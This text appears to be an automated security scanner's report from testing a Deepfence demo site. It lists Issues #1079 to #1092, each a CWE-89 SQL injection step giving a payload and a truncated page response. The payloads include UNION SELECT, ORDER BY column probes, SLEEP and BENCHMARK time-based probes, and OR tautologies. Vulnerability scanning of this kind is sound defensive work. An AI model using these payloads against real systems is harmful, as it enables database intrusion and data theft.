href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1079\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1080\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #1081\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1082\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1083\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1084Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1085\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1086\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1087\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1088\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iopg_SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1089\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or (\"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1090\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1091\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL \nSELECTCHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1092\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 